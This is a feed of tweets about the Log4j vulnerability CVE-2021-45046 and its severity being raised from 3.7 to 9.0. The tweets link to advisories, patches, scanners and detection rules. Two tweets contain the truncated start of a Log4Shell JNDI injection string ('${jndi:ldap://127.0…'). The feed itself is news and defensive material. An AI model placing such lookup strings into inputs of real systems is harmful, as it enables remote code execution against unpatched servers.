2021-12-18 09:42:57.@FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/1RCCxt5qfE https://twitter.com/i/web/status/1472137821511110662ChrisRobertsSec
2021-12-18 08:30:59[Underway] Emergency Maintenance for CVE-2021-45046 - Zettagrid All Availability Zones: The scheduled maintenance i… https://t.co/R8TdOMNfDY https://twitter.com/i/web/status/1472120762261815298ZettaOps
2021-12-18 07:44:05"Please note .. 2nd #log4j #Vulnerability (CVE-2021-45046) just got a higher #CVE value of 9.0 as there are some si… https://t.co/uSgkNjsTCl https://twitter.com/i/web/status/1472107432885338115christinayiotis
2021-12-18 07:33:27あれ... Log4j 2.17.0が出てる...CVE-2021-45105が新しく出てきてた. あとCVE-2021-45046のCVSSも9.0に変更されてるし、色々と追加で明らかになった感じなんかな? https://t.co/6dhH6yBesg https://logging.apache.org/log4j/2.x/security.htmlkasa_zip
2021-12-18 07:30:21Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/cRTcBfbfbA https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/john77665
2021-12-18 07:00:36It's the second saturday morning being consumed by CVE-2021-45046 🥳TheEthanHunt0
2021-12-18 05:23:49CVE-2021-44228 & CVE-2021-45046 - Use AWS Services to protect, detect and respond! #aws #log4j #cve202144228… https://t.co/1njWN1vIL8 https://twitter.com/i/web/status/1472072430759952392anshumanch
2021-12-18 05:23:28Apache Log4j2 Vulnerability | CVE-2021-44228 | CVE-2021-45046 |Log4j 2.1... https://t.co/VE7tQeoFIF via @YouTube #cve202144228 #cve202145046 https://youtu.be/ziZnU3t-DRManshumanch
2021-12-18 04:52:08"Update 09:11 AM ET: Severity for CVE-2021-45046 changed to Critical/9.0 according to Apache's updated advisory page."ohhara_shiojiri
2021-12-18 04:31:34これ、さらにCVE-2021-45046も同じようなリスティングが必要になるのか… https://t.co/DD5Jx5zKUg https://twitter.com/mimura1133/status/1472026860892856322danna_2010
2021-12-18 04:30:18Excerpt: CVE-2021-44228 (and subsequently CVE-2021-45046) describe a security issue found in the Apache Log4j 2 Jav… https://t.co/WkbhoBmTbY https://twitter.com/i/web/status/1472061457265213442AWSBlogs
2021-12-18 04:12:18CVE-2021-44228 Impact of Log4j Vulnerability CVE-2021-44228 and CVE-2021-45046 (Severity: CRITICAL) -… https://t.co/JItXR8uK2k https://twitter.com/i/web/status/1472054395781230599CisoInvisible
2021-12-18 04:11:49The second Log4j vulnerability (CVE-2021-45046) identified in 2.15.0, was just reclassified from "DoS" to "RCE" and… https://t.co/5PTm86Rzo4 https://twitter.com/i/web/status/1472055182078857220beingsheerazali
2021-12-18 02:50:22Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any… https://t.co/aIyRZ5Enex https://twitter.com/i/web/status/1472036382147325952ivangaravito
2021-12-18 02:40:20もうこうなってくるとわからないな。 JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/zuTiDO7yQa https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/syusseki_card
2021-12-18 02:30:36Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/mAWkCKzUgZ https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/MasafumiNegishi
2021-12-18 02:03:22An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/aEMiOElsui https://twitter.com/i/web/status/1472021680344215554ProductCERT
2021-12-18 01:51:44#Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second #log4j Vulnerability (CVE-2021-45046) https://t.co/MkAgLUl76u https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/Cyber_O51NT
2021-12-18 01:00:32CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/YMvrYStj5n https://twitter.com/i/web/status/1472008155106320390ka0com
2021-12-18 00:50:21CVE-2021-45046 の緊急度がCritical に Apacheサイト更新。緊急度が3.7→9.0に。Log4j 2.15.0へ追加のエクスプロイトが発見され、情報漏えい,RCE(リモートコード実行),LCE(ローカル… https://t.co/Jm5b4FjS5J https://twitter.com/i/web/status/1472004865782325248seigo303
2021-12-18 00:33:05A new #attackerkb assesment on 'CVE-2021-45046' has been created by gwillcox-r7. Attacker Value: 2 | Exploitability… https://t.co/Og6ytNKkko https://twitter.com/i/web/status/1472001026249179141Attackerkb_Bot
2021-12-18 00:20:45🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/zIIhPW08k9 https://twitter.com/i/web/status/1471998534215892996threatintelctr
2021-12-18 00:10:22Arctic Wolf releases Log4Shell Deep Scan tool to enable detecting both CVE-2021-45046 and CVE-2021-44228 within nes… https://t.co/Ai3gaY3QKf https://twitter.com/i/web/status/1471995486009704450AWNetworks
2021-12-17 23:31:12The latest update for #WhiteSource includes "#Log4j Vulnerability CVE-2021-45046 Explained" and "New Log4j Vulnerab… https://t.co/z2o4CM0Fw4 https://twitter.com/i/web/status/1471985802309775365opsmatters_uk
2021-12-17 23:20:16🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/mFar3iCsLE https://twitter.com/i/web/status/1471983432410570756threatintelctr
2021-12-17 23:16:29Breaking: CVE-2021-45046 has now changed from a Low 3.7 to a Critical 9.0. For more details and remediation advice,… https://t.co/8cyuUBAyR5 https://twitter.com/i/web/status/1471978765093847040WhiteSourceSoft
2021-12-17 23:15:46An update to GitHub’s response to Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046 https://t.co/CKZwq8hbBF https://t.co/l6RSKj6J1m https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/ https://twitter.com/GitHubSecurity/status/1470472001529778188GitHubSecurity
2021-12-17 23:15:21CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-17 22:50:51Today, I was proven wrong by https://t.co/znnuQEyzh9 This makes CVE-2021-45046 a CVSS score 9.0 Congrats,… https://t.co/LKbAqN906U https://mobile.twitter.com/marcioalm/status/1471740771581652995 https://twitter.com/i/web/status/1471974981479374851fluepke
2021-12-17 22:30:45Log4j 2.16.0および、Java7で頑張る環境向けのLog4j 2.12.2のリリースに関する記事。CVE-2021-45046にも対応。メッセージのlookupとjndiへのアクセスが削除されている。 ・・・ほらやっぱり… https://t.co/nWSFT5ou09 https://twitter.com/i/web/status/1471970506090119168Tellur128
2021-12-17 22:23:09CVE-2021-45046 has now been upgraded to a CVSS score of 9.0 since it can be used for remote code execution (RCE). F… https://t.co/eXHDg8pwam https://twitter.com/i/web/status/1471966848149245958deborah_galea
2021-12-17 22:18:48Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) #log4j #vulnerability… https://t.co/j6ExFDWZtp https://twitter.com/i/web/status/1471963509869228041RH_ISAC
2021-12-17 22:17:09@SritaKaren Y de hecho... "Earlier today, the second Log4j vulnerability (CVE-2021-45046) was upgraded from a CVSS… https://t.co/h2rx1Fukvn https://twitter.com/i/web/status/1471964403977359364dabraxas
2021-12-17 22:02:59CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked #infosec #infosecurity #cybersecurity #threatintel… https://t.co/rvNzsVxRzp https://twitter.com/i/web/status/1471961428366086147CyberIQs_
2021-12-17 21:43:04First mindmap - Am I vulnerable to Log4shell (v5.0, updated with higher impact for CVE-2021-45046) https://t.co/ltBbtfnJ1nDick_Reverse
2021-12-17 21:32:17Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/zW0Zaz271w https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/piyokango
2021-12-17 21:30:28CVE-2021-45046: Ya manden a las casasricardoarguello
2021-12-17 21:12:14Citrix Security Advisory for Apache CVE-2021-44228 and CVE-2021-45046 | https://t.co/A6eXrAXmYI https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-17 21:00:33Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) https://t.co/otnNlTwZj8 via @LunaSecIO https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/koobs
2021-12-17 21:00:16In addition to #log4j a NEW separate vulnerability, CVE-2021-45046, was recently discovered in Log4j 2.15.0 that co… https://t.co/HOMdW6Re3E https://twitter.com/i/web/status/1471947484532391936SECNAP
2021-12-17 20:40:20The CVSS score of CVE-2021-45046 for log4j 2.15 was upgraded from 3.7 -> 9.0. Time to upgrade to 2.16. https://t.co/bd25SAjUVc https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/manicode
2021-12-17 20:31:51@slicedlime Is Minecraft: Java Edition 1.18.1 vulnerable to CVE-2021-45046?fiafied
2021-12-17 20:31:085th update with new info on CVE-2021-45046. #Log4j Via @_saadk This is a continuously developing situation UPD… https://t.co/tofLkkwZFd https://twitter.com/i/web/status/1471939080925626369argevise
2021-12-17 20:12:12VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046) https://t.co/WtFtIaZvy6 https://lnkd.in/dWR-CP3Bmelihozhan
2021-12-17 20:09:57@HonkHase @HiSolutions Der CVE-2021-45046 für 2.15 hat es jetzt auch offiziell in den Rang einer RCE (CVSS 9.0) ges… https://t.co/E0TPMUPsOj https://twitter.com/i/web/status/1471912555148984329ePD5qRxX
2021-12-17 20:00:50Log4Shell: Rilasciato PoC pubblico per lo sfruttamento della CVE-2021-45046 (AL03/211217/CSIRT-ITA) https://t.co/JKYXofMQnF https://csirt.gov.it/contenuti/log4shell-rilasciato-poc-pubblico-per-lo-sfruttamento-della-cve-2021-45046-al03-211217-csirt-itanicolaferrini
2021-12-17 19:51:51A second Log4j exploit is incoming. CVE-2021-45046: risk raised from 3.7 (dos) to 9.0 (rce) 2.15.0 formatMsgNoLook… https://t.co/emtG7ZX5tb https://twitter.com/i/web/status/1471928935982239745Krin_o_o_
2021-12-17 19:30:57As of very early this morning Apache has a CVSS of 9.0 for CVE-2021-45046 https://t.co/E5Z20Rc5Mc But NVD still ha… https://t.co/YaK1BGThk5 https://logging.apache.org/log4j/2.x/security.html https://twitter.com/i/web/status/1471924678654574593WeldPond
2021-12-17 19:30:40Strange the way CVE-2021-45046 has a CVSS base score of 9 here https://t.co/5ttxljBU3Y but on NVD it's still at 3.7… https://t.co/d3xRE9xfHx https://logging.apache.org/log4j/2.x/security.html https://twitter.com/i/web/status/1471925076140470281notoole
2021-12-17 19:22:03CVE-2021-45046 changed from CVSS 3.7 to 9.0 due to it being determined that the issue was an RCE in Log4j 2.15 and… https://t.co/3TOVPk9RJM https://twitter.com/i/web/status/1471920924567998471CyberHues
2021-12-17 19:21:33Log4Shell: Rilasciato PoC pubblico per lo sfruttamento della CVE-2021-45046 (AL03/211217/CSIRT-ITA) https://t.co/C5HHcIfMwR https://ift.tt/33E0q9USinetNews
2021-12-17 19:21:01@Recon_InfoSec What about CVE-2021-45046?darksiderealm
2021-12-17 19:10:40Actualización sobre la #vulnerabilidad de #Log4j La puntuación de la vulnerabilidad CVE-2021-45046 incrementó de 3.… https://t.co/XIASYBIsJq https://twitter.com/i/web/status/1471919916471234560NST_IT
2021-12-17 19:10:15Bad news: CVE-2021-45046, the Log4j vulnerability disclosed this week is no longer a moderate DoS flaw. Apache nows… https://t.co/gCsyJrdrbx https://twitter.com/i/web/status/1471920350640455684RobWright22
2021-12-17 19:00:29‼️ #Log4Shell: Rilasciato pubblicamente un PoC per lo sfruttamento della CVE-2021-45046, il cui score CVSS è stato… https://t.co/MosoPI0WVP https://twitter.com/i/web/status/1471917682362621959csirt_it
2021-12-17 18:41:25Important: the second vuln, CVE-2021-45046, is now CRITICAL because remote code execution is possible in #Log4j ver… https://t.co/ImWjVzTFab https://twitter.com/i/web/status/1471911364490764291prajeshrawat
2021-12-17 18:31:38Bump given the change in severity of CVE-2021-45046 from 3.7 to 9.0 (CVSS) https://t.co/GG7tE9pDlM https://t.co/5rfnmg4c0M https://logging.apache.org/log4j/2.x/security.html https://twitter.com/Darkarnium/status/1470888766265085959Darkarnium
2021-12-17 18:21:55⚠️La #vulnerabilidad CVE-2021-45046 en #log4j: ¡También permite #RCE! La puntuación CVSS se incrementó de 3.7 a 9.0… https://t.co/gCowK23BOw https://twitter.com/i/web/status/1471906159418347523unamcert
2021-12-17 18:21:20Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/zefJGGWS04 https://dy.si/PYAGKbViVarunVerma
2021-12-17 18:11:54Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/kx9L6IvIB3 https://dy.si/PLvJeTinaKrogull
2021-12-17 18:11:45CVE-2021-45046、DoSだけだと思ってたら、限定的ながらRCEもできるということで、CVSS値が3.7から9.0に増加しました、とのこと… / https://t.co/nkoNTOgwI9 https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/wakatono
2021-12-17 18:10:39#Log4J Update! CVE-2021-45046, aka the 2nd bug that was found in version 2.15 and initially believed to be a denia… https://t.co/EF14fY8zXE https://twitter.com/i/web/status/1471904726530740225Laughing_Mantis
2021-12-17 18:01:06‼Earlier today, the second #Log4j vulnerability (CVE-2021-45046) was upgraded from a CVSS score of 3.7 (limited DOS… https://t.co/znnMRsxnsK https://twitter.com/i/web/status/1471901772436234245alertlogic
2021-12-17 18:00:11CVSS score upgraded to 9 for #log4j CVE-2021-45046. Good idea to upgrade to 2.16.0, if not already done. https://t.co/j2oyORCXoH https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/dhrubajyoti_g
2021-12-17 17:30:50Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize... https://t.co/3FG2xqiss5 https://dy.si/MRppVkevinpollock
2021-12-17 17:30:23Oha, der 2. CVE für log4j (CVE-2021-45046) wurde nachträglich von 3.7/10 auf 9/10 hochgestuft. Damit fast genauso d… https://t.co/e5stSZAszj https://twitter.com/i/web/status/1471894890908950536knalli
2021-12-17 17:23:58#log4j Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system wi… https://t.co/FugTlrcgr0 https://twitter.com/i/web/status/1471890664744964108IT_news_for_all
2021-12-17 17:21:41Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/BzBTivEf55 #log4j… https://t.co/NGJMWrUFwU https://angrysysops.com/2021/12/17/additional-step-for-vcenter-server-cve-2021-44228-and-cve-2021-45046-workaround/ https://twitter.com/i/web/status/1471892292206215174AngrySysOps
2021-12-17 16:50:54@lgimel זו לא המשמעות של CVE-2021-45046.srockets
2021-12-17 16:40:32@buherator @GossiTheDog Right, but CVE-2021-45046 applies to every log4j2 version up to and including 2.15. The des… https://t.co/5MK3OAeRk5 https://twitter.com/i/web/status/1471880871837851655wdormann
2021-12-17 16:31:11Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/UGC8uEkAu1 https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/_mattata
2021-12-17 16:31:10@siliconjesus *CVE-2021-45046 upgraded from 3.7 to 9* "So, about that final work day..."neurobashing
2021-12-17 16:30:41Some specifics: - Vitess (@vitessio) 10.0.4 - CVE-2021-45046. - Longhorn (@longhorn_io) 1.2.3 - CVE-2021-36779 & -3… https://t.co/fgpWraYJLy https://twitter.com/i/web/status/1471878971793018884appd8_
2021-12-17 16:28:36Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/vCXhAoaRxt https://bit.ly/325Gb4cmmyyffooxx
2021-12-17 16:25:23If you are mitigating CVE-2021-44228 correctly, then you are mitigating CVE-2021-45046. I don't understand the desi… https://t.co/BynZGwroXi https://twitter.com/i/web/status/1471873202477584394nluedtke1
2021-12-17 16:04:20Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) ${jndi:ldap://127.0… https://t.co/ugr3qFtfA2 https://twitter.com/i/web/status/1471871187873579012Mohamed87Khayat
2021-12-17 16:04:00Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/Iz39FNCVVP https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/SeanWrightSec
2021-12-17 16:02:30Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/4WFLVRU0mV https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/jsgrenon
2021-12-17 15:57:07Log4j脆弱性の一つCVE-2021-45046がアップデートされ、CriticalのRCEに。 Exploitには限定的な条件下に限られるがPOCも公開されており、2.16.0へのUpgrade等でJNDI Lookupの無効… https://t.co/LjqjdXBGF2 https://twitter.com/i/web/status/1471869168253542401kterashita
2021-12-17 15:49:51@cybereason releases updated and persistent workaround to prevent exploitation of CVE-2021-44228 and CVE-2021-45046… https://t.co/RLATg2LHlK https://twitter.com/i/web/status/1471866123608023047InakMali
2021-12-17 15:48:19@briggsl @marcioalm CVE-2021-45046nulllzero
2021-12-17 15:44:41#Cybereason releases updated and persistent workaround to prevent exploitation of CVE-2021-44228 and CVE-2021-45046… https://t.co/jM5UeFVqYz https://twitter.com/i/web/status/1471866785943146502InakMali
2021-12-17 15:39:44wow this second #Log4j #vulnerability CVE-2021-45046 got bumped from 3.7 (#DOS) to 9.7 (#RCE) and now 2.16.0 is bum… https://t.co/ueSCXa4wPw https://twitter.com/i/web/status/1471863699262652416IdentityMonk
2021-12-17 15:23:11🚨 It Seems Log4J is not done yet. CVE-2021-45046 was just updated. My advice: Use an SCA like Snyk Open Source im… https://t.co/1DN8R6EE51 https://twitter.com/i/web/status/1471861609538670595cu_0xff
2021-12-17 15:21:16@CGuntur That is CVE-2021-45046 though which has it's score updated.Ganapathi004
2021-12-17 15:12:59Note that due to these mitigation bypasses, CVE-2021-45046 was upgraded from a CVSS score of 3.7 (low - local DoS)… https://t.co/rry5IX7D17 https://twitter.com/i/web/status/1471858658237562881jfrog
2021-12-17 15:12:49Heads up! Another critical vulnerability CVE-2021-45046 in #Log4j Java Library steps into the spotlight just after… https://t.co/xp4jBB7OoX https://twitter.com/i/web/status/1471858757126787075SOC_Prime
2021-12-17 15:12:20La vulnerabilidad CVE-2021-45046 ha sido elevada a riesgo crítico pasando de CVSS 3.7 a CVSS 9.0: https://t.co/MTp7BZd5eP https://logging.apache.org/log4j/2.x/security.htmlmigueljmnez
2021-12-17 15:11:04Uuuund #log4shell gegen die 2.15 (CVE-2021-45046) ist nun auch critical, und das Upgrade auf 2.16 wird mandatory.hiergiltdiestfu
2021-12-17 15:03:37Good news everyone, CVE-2021-45046, the #Log4j DoS vulnerability has been upgraded from a CVSS 3.7 to CVSS 9.0 and… https://t.co/hwzGRialqm https://twitter.com/i/web/status/1471855248323010560ConnectWiseCRU
2021-12-17 15:02:19se reduce a actualizar todo de nuevo a tener log4j 2.16 debido a que la nueva vulnerabilidad CVE-2021-45046 fue ele… https://t.co/EWtAybfsCc https://twitter.com/i/web/status/1471856484480737281hmier
2021-12-17 14:53:48Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) https://t.co/AbAN2NR8I5 https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/nmantani
2021-12-17 14:52:38#Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/okehwFfU7U https://buff.ly/3mdFNaKdnsmichi
2021-12-17 14:51:12@Iamascientist6 See: https://t.co/pf0VXePPEb CVE-2021-45046 Severity: Critical Base CVSS Score: 9.0 (AV:N/AC:H/PR:… https://t.co/9BTARop6dg https://logging.apache.org/log4j/2.x/security.html https://twitter.com/i/web/status/1471854963651403778SimonByte
2021-12-17 14:41:302.16.0 still fixes CVE-2021-45046. https://t.co/j1kXAqtsZu has not yet updated with new rating. The Apache Loggin… https://t.co/ubFAzaKrUx https://nvd.nist.gov/vuln/detail/CVE-2021-45046 https://twitter.com/i/web/status/1471851214082035723jschauma
2021-12-17 14:32:17Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) https://t.co/nrD9eUg6qn https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/sarmentots
2021-12-17 14:31:20Heads up, the second VCE issued concerning log4j, CVE-2021-45046, originally scored as a CVSS of 3.7 has been upgra… https://t.co/q7ccxYx4OL https://twitter.com/i/web/status/1471849269065883653DaleMAtDell
2021-12-17 14:31:14Note: Severity of log4j CVE-2021-45046 (non-default pattern layout Thread Context Map ${ctx:) upgraded from CVSS 3.… https://t.co/hE54TzvhUF https://twitter.com/i/web/status/1471849336648749064jschauma
2021-12-17 14:22:34Important: the second vuln, CVE-2021-45046, is now CRITICAL because remote code execution is possible in #Log4j ver… https://t.co/8kctD0wZ0x https://twitter.com/i/web/status/1471845719518715906likethecoins
2021-12-17 14:22:02CVE-2021-45046でRCE再現はできたけどリモートクラスのロードが手元だと出来ないな https://t.co/MiRkKa9fad https://twitter.com/knqyf263/status/1471835582959693827knqyf263
2021-12-17 14:21:45Breaking news: Apache Foundation upgrades CVE-2021-45046 from 3.7 to 9.0 due to a RCE PoC that was released. Patch… https://t.co/jQHQPLfEcA https://twitter.com/i/web/status/1471846512548274184chevonphillip
2021-12-17 14:21:32A new Log4j vulnerability, CVE-2021-45046, has been discovered. CyCognito is not impacted by the Apache Log4j vulne… https://t.co/DOPGoWkc4E https://twitter.com/i/web/status/1471846776227479570CyCognito
2021-12-17 14:20:42Given the severity for CVE-2021-45046 just got elevated to a 9.0 RCE, I feel pretty safe in this prediction. Take a… https://t.co/khgJad1onK https://twitter.com/i/web/status/1471847408237699079ClaireTills
2021-12-17 14:20:07Apache issued a new vulnerability report for a DoS flaw in that version (CVE-2021-45046). But researchers discovere… https://t.co/P3Ay0iSKlj https://twitter.com/i/web/status/1471847656226013189DecipherSec
2021-12-17 14:11:58Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) ${jndi:ldap://127.0… https://t.co/CV9bXKbAzm https://twitter.com/i/web/status/1471842969497915393arphanetx
2021-12-17 14:11:552.15.0に上げた後CVE-2021-45046が出てきて、「スコア3.7だし放置でいいかー」と安心してたら年末の金曜夜に9.0に格上げ、とか対応するの難しいところあるだろうな。asano_ko
2021-12-17 14:11:11NEW: The Apache Software Foundation updated the CVSS score for the second #Log4j vulnerability (CVE-2021-45046) fro… https://t.co/HKPAu25Wox https://twitter.com/i/web/status/1471844070523912196audrastreetman
2021-12-17 14:10:42Second Log4j Vulnerability (CVE-2021-45046) Discovered New Patch Released https://t.co/zCZpQpofMf https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlsamilaiho
2021-12-17 14:10:31So CVE-2021-45046 for Log4J which was previously limited to a Denial of Service (CVSS Score 3.7) has been upgraded… https://t.co/rkq8C5zOoT https://twitter.com/i/web/status/14718444556195635210x48756773
2021-12-17 14:10:08The Apache Log4j team has updated the score of CVE-2021-45046 from 3.7 to 9.0 (Critical)! Security experts found a… https://t.co/PDmifANVNV https://twitter.com/i/web/status/1471845030973386764zidane007nl
2021-12-17 14:04:43@marcioalm @cyb3rops I have published Splunk Detection Rules for CVE-2021-44228 and CVE-2021-45046! Thanks for your… https://t.co/O2suZO2iB0 https://twitter.com/i/web/status/1471822331978862597Cystrat_GmbH
2021-12-17 14:01:55CVE-2021-45046 it's no longer just a possible DoS: "...resulting in an information leak and remote code execution… https://t.co/kdOUKwojsC https://twitter.com/i/web/status/1471837734670983170dyn___
2021-12-17 14:01:06CVE-2021-45046 も Score 9 に引き上げられてる... https://t.co/IZfLkSbSLw https://twitter.com/yuki_kawamitsu/status/1470912008786948096yuki_kawamitsu
2021-12-17 14:00:31“Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec” https://t.co/puQIfp6f0u https://htn.to/38PGccQYVtminamijoyo
2021-12-17 14:00:27Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 4.3M (audience size) CVE-2021-45046: 1.9M CVE-2021-208… https://t.co/LNusEfGEKO https://twitter.com/i/web/status/1471842628228558848CVEtrends
2021-12-17 13:58:56Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec: https://t.co/1Nh3EtQy8s https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increaseddigeex_security
2021-12-17 13:58:44#log4j CVE-2021-45046 CVSS rating score was updated from 3,7 to 9,0 (of max. 10)! https://t.co/uBGnarsPfj… https://t.co/WKpjU7tpgc https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/ https://twitter.com/i/web/status/1471839937095942146JensGleichmann
2021-12-17 13:54:54Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046)… https://t.co/yPXRYsFXOn https://twitter.com/i/web/status/1471835204235018244FredrikVerriest
2021-12-17 13:36:33Log4Shell Update: Second Log4j vulnerability (CVE-2021-45046) upgraded from CVSS score of 3.7 (limited DOS) to CVS… https://t.co/AZYRGgzeL8 https://twitter.com/i/web/status/1471833943230062599SimonByte
2021-12-17 13:35:31#Log4Shell update 🪵4⃣🐚 CVE-2021-45046 CVSS score changed from 3.7 to 9.0 A PoC allowing an RCE was published,… https://t.co/XVCNOzykgd https://twitter.com/i/web/status/147183441075229900941thexplorer
2021-12-17 13:25:51According to CERT of Germany, second #log4j vulnerability, CVE-2021-45046, enables remote code execution. 😱… https://t.co/7hw7mhuLE3 https://twitter.com/i/web/status/1471830072759836673juha_remes
2021-12-17 13:25:26#Log4Shell #log4j CVE-2021-45046 Log4j CVE-2021-45046 has been changed from CVSS 3.7 to 9.0 due to findings that i… https://t.co/l8ksbD1VMl https://twitter.com/i/web/status/1471830122948931590TomSellers
2021-12-17 13:23:01CVE-2021-45046 just now changed from CVSS 3.7 to 9.0 critical accordung to this. Must update to 2.16.0! This "gift… https://t.co/iT31Tc89qh https://twitter.com/i/web/status/1471831092466491397kumareshsomi
2021-12-17 13:02:40Eerder vandaag werd de tweede Log4j-kwetsbaarheid (CVE-2021-45046) opgewaardeerd van een CVSS-score van 3,7 (beperk… https://t.co/D5hc0ULm8L https://twitter.com/i/web/status/1471826672064335872ronaldkingma
2021-12-17 12:52:19The second Log4j vulnerability (CVE-2021-45046) identified in 2.15.0, was just reclassified from "DoS" to "RCE" and… https://t.co/YEfOmh4j9I https://twitter.com/i/web/status/1471823969548488710christophetd
2021-12-17 12:45:35CVE-2021-45046 changed from CVSS 3.7 to 9.0 due to it being determined that the issue was an RCE in Log4j 2.15 and… https://t.co/dI8yf6Ku55 https://twitter.com/i/web/status/1471820651010961412marcwrogers
2021-12-17 12:44:42Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x… https://t.co/Yiohpcd2lz https://twitter.com/i/web/status/1471821238129545221AngrySysOps
2021-12-17 12:42:52CVE-2021-45046 、RCEになっているけど大丈夫なのか世間??GSqGrISYK64XqfR
2021-12-17 12:31:09Fixed in Log4j 2.12.2 (Java 7) and Log4j 2.16.0 (Java 8) https://t.co/b8oC9ZJQ5f CVE-2021-45046, CVSS 9.0 "While Lo… https://t.co/RrmdCrVfd6 https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.12.2_.28Java_7.29_and_Log4j_2.16.0_.28Java_8.29 https://twitter.com/i/web/status/1471818645127200770kaito834
2021-12-17 12:25:50#Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) -> update log4j to… https://t.co/f15MhocpKu https://twitter.com/i/web/status/1471815112579293197MiguelHzBz
2021-12-17 12:24:43…… https://t.co/wyU9tQ4Hfp CVE-2021-45046: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code… https://t.co/9CNZBaPNFy https://logging.apache.org/log4j/2.x/security.html https://twitter.com/i/web/status/1471816150556512259aki_takayama
2021-12-17 12:20:53For anyone in #NFT using Cloudflare: update log4j2 to version 2.16.0. CVE-2021-45046 makes it possible for threa… https://t.co/dzKGMeFBaW https://twitter.com/i/web/status/1471817188457734144nft_sec
2021-12-17 12:11:12Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046)… https://t.co/j80VdSKaZT https://twitter.com/i/web/status/1471814013193699330kaito834
2021-12-17 12:10:20Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨:CodeZine(コードジン) https://t.co/YnfJ054wfc… https://t.co/jZaAIEqEKt https://codezine.jp/article/detail/15346 https://twitter.com/i/web/status/1471814235386974208munakuu
